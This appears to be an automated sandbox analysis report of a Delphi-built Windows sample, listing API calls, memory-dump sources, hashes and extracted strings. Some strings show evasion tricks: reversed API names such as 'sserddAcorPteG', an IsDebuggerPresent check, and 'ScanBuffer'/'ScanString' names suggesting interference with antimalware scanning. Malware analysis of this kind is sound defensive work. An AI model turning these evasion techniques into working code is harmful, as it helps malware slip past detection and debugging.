                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$HandleModule
                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                        • Opcode ID: 1387093b9f8e90d4954ee94975080c701c6e4c6154b20d657fbefb858625b301
                                                                                                                        • Instruction ID: 9ca3a80466205a6e0cf9cb8267ffc17b14f1cf1ebe4e677c9bde0e5896baebf4
                                                                                                                        • Opcode Fuzzy Hash: 1387093b9f8e90d4954ee94975080c701c6e4c6154b20d657fbefb858625b301
                                                                                                                        • Instruction Fuzzy Hash: 253174B2A40304BBDB20DF68CD85F5977ACAF45324F108564FA54EB281D374E960EB65
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8,?,?,029ED7A8,029C655D,029EC30D), ref: 029C4365
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8,?,?,029ED7A8,029C655D,029EC30D), ref: 029C436B
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,029C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8), ref: 029C4380
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,029C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?), ref: 029C4386
                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029C43A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                        • Opcode ID: c5b2505a97b87ae4d70ef8caade6e2ac9064cdc373c22367a2247d77ef6f0490
                                                                                                                        • Instruction ID: a0155842661a1391bcd0456c9d2450539d6110ac294b5624a683954f00b17af3
                                                                                                                        • Opcode Fuzzy Hash: c5b2505a97b87ae4d70ef8caade6e2ac9064cdc373c22367a2247d77ef6f0490
                                                                                                                        • Instruction Fuzzy Hash: 28F090B0BC434079FE15A7A0AE66F59675C47C4B35F340A0DB625A81C2CBA9D0C5CB3B
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029CACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                          • Part of subcall function 029CACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                          • Part of subcall function 029CACC4: GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                          • Part of subcall function 029CACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
                                                                                                                        • CharToOemA.USER32(?,?), ref: 029CAE83
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029CAEA0
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEA6
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,029CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEBB
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,029CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEC1
                                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029CAEE3
                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 029CAEF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 185507032-0
                                                                                                                        • Opcode ID: eaef128e03162120a97379982cf9fa4b3a6bf283baad14afaaa51881b3249593
                                                                                                                        • Instruction ID: 89ade34ed2fc2b1117a93c6ac5dd1f94f38859e26416e97bb8bff29c4aa8f8a9
                                                                                                                        • Opcode Fuzzy Hash: eaef128e03162120a97379982cf9fa4b3a6bf283baad14afaaa51881b3249593
                                                                                                                        • Instruction Fuzzy Hash: B0117CB2588304BAD200FBA4CD84F9B77EEABC4710F60092EB384D60D0DA74E9448F67
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029CE5AD
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029CE5C9
                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029CE602
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029CE67F
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029CE698
                                                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 029CE6CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 351091851-0
                                                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction ID: c884a381b70437853b17c7616dbb394f29b30e78ebb71aed97ea13f4e5108153
                                                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction Fuzzy Hash: 8651E875A1062D9BCB26EB58CC80BD9B7BDBF8C300F5041E9E549A7241D734AF858F62
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C358A
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35BD
                                                                                                                        • RegCloseKey.ADVAPI32(?,029C35E0,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                                                        • API String ID: 667068680-1372893251
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,029CAA6F,?,?,00000000), ref: 029CA9F0
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,029CAA6F,?,?,00000000), ref: 029CAA20
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 029CAA2B
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,029CAA6F,?,?,00000000), ref: 029CAA49
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 029CAA54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4102113445-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C3538: GetKeyboardType.USER32(00000000), ref: 029C353D
                                                                                                                          • Part of subcall function 029C3538: GetKeyboardType.USER32(00000001), ref: 029C3549
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 029EC06C
                                                                                                                        • GetACP.KERNEL32 ref: 029EC080
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 029EC08A
                                                                                                                          • Part of subcall function 029C3568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C358A
                                                                                                                          • Part of subcall function 029C3568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35BD
                                                                                                                          • Part of subcall function 029C3568: RegCloseKey.ADVAPI32(?,029C35E0,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                        • String ID: &v
                                                                                                                        • API String ID: 3316616684-2659828657
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,029CAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029CAAB7
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,029DEF98,UacInitialize,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize), ref: 029DEB9A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029DEBAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,029EC10B,00000000,029EC11E), ref: 029CC402
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029CC413
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029CE21F
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029CE23B
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029CE2B2
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 029CE2DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 920484758-0
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029C9562), ref: 029C94FA
                                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029C9562), ref: 029C9500
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                        • String ID: yyyy
                                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029D8216), ref: 029D81F8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                                                        • API String ID: 3811539418-184458249
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAD98
                                                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 029DADC8
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 029DADE7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DADF3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$Write
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3448952669-0
                                                                                                                        • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                        • Instruction ID: d6a23cba0673f44f62e30376c104be62a1b827d84efb00cc220cec7cb6427403
                                                                                                                        • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                        • Instruction Fuzzy Hash: 182184B1A403199BDF10DF69CD80BAE77B9EF84362F108515EE5097340EB34D921EAA4

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:12.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:79.6%
                                                                                                                        Signature Coverage:22.7%
